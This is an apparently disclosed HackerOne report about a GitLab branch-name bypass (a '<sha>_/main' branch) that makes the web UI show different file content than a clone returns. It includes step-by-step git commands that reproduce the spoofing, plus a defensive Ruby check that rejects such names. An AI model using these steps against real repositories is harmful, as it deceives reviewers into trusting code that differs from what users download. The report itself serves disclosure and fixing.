Manipulate the repository content in the UI (bypass #2031845)
HackerOne report #2173053 by shells3c
on 2023-09-20, assigned to GitLab Team
Report
Summary
In order to fix #2031845, GitLab added another check in the prohibited_branch_checks method to prevent any branch name that matches <hex>-/. However, the _ character also works and hasn't been protected yet.
Steps to reproduce
- Create a new empty project on GitLab
- Clone the project and create a safe repository for UI display:
    mkdir -p ./_/main
    echo "safe" > ./_/main/script.sh
    git add -A
    git commit -m .
    git push origin
- Create a malicious branch with the malicious code:
    git checkout --orphan "$(git rev-parse HEAD)_/main"
    git rm -rf .
    echo "evil" > script.sh
    git add -A
    git commit -m .
    git push origin
- Go to your repository settings and set your default branch to the new branch

Now visit the project from GitLab and view the content of script.sh: you will see safe, but if you clone it, the file will contain evil.
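Added here as an illustrative server-side check, not GitLab's own prohibited_branch_checks code: a Ruby predicate that rejects both separator shapes named in this report. It assumes the rule is "a full 40-hex commit SHA at the start of the branch name, followed by - or _ and a slash"; the sample names and SHA are constructed.

```ruby
# Illustrative check (not GitLab's own code): reject branch names that begin with a
# full 40-hex commit SHA followed by a "-/" or "_/" separator. Blocking only "<hex>-/"
# left "<hex>_/" open, so the character class covers both separators.
SHA_PREFIXED_BRANCH = /\A\h{40}[-_]\//

def prohibited_branch_name?(name)
  !!(name =~ SHA_PREFIXED_BRANCH)
end

# Filter a list of proposed branch names down to those that should be rejected,
# as a pre-receive style check would do for each pushed ref.
def prohibited_branches(names)
  names.select { |n| prohibited_branch_name?(n) }
end

# Constructed sample input: a made-up SHA plus the name shapes from the report.
SAMPLE_SHA = "0123456789abcdef0123456789abcdef01234567"
SAMPLES = [
  "main",
  "feature/#{SAMPLE_SHA}",   # SHA not at the start of the name: allowed
  "#{SAMPLE_SHA}-/main",     # original #2031845 shape: blocked
  "#{SAMPLE_SHA}_/main",     # bypass shape from this report: blocked
  "#{SAMPLE_SHA}/main",      # SHA followed directly by a slash: not covered by this rule
]

if __FILE__ == $PROGRAM_NAME
  prohibited_branches(SAMPLES).each { |b| puts "reject: #{b}" }
end
```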
Output of checks
This bug happens on GitLab.com
Impact
Similar to #1864278 (you can read it here if you can't access the HackerOne report), the repository you see from the UI is different from the repository you clone. You can see the video in the original report to understand it better.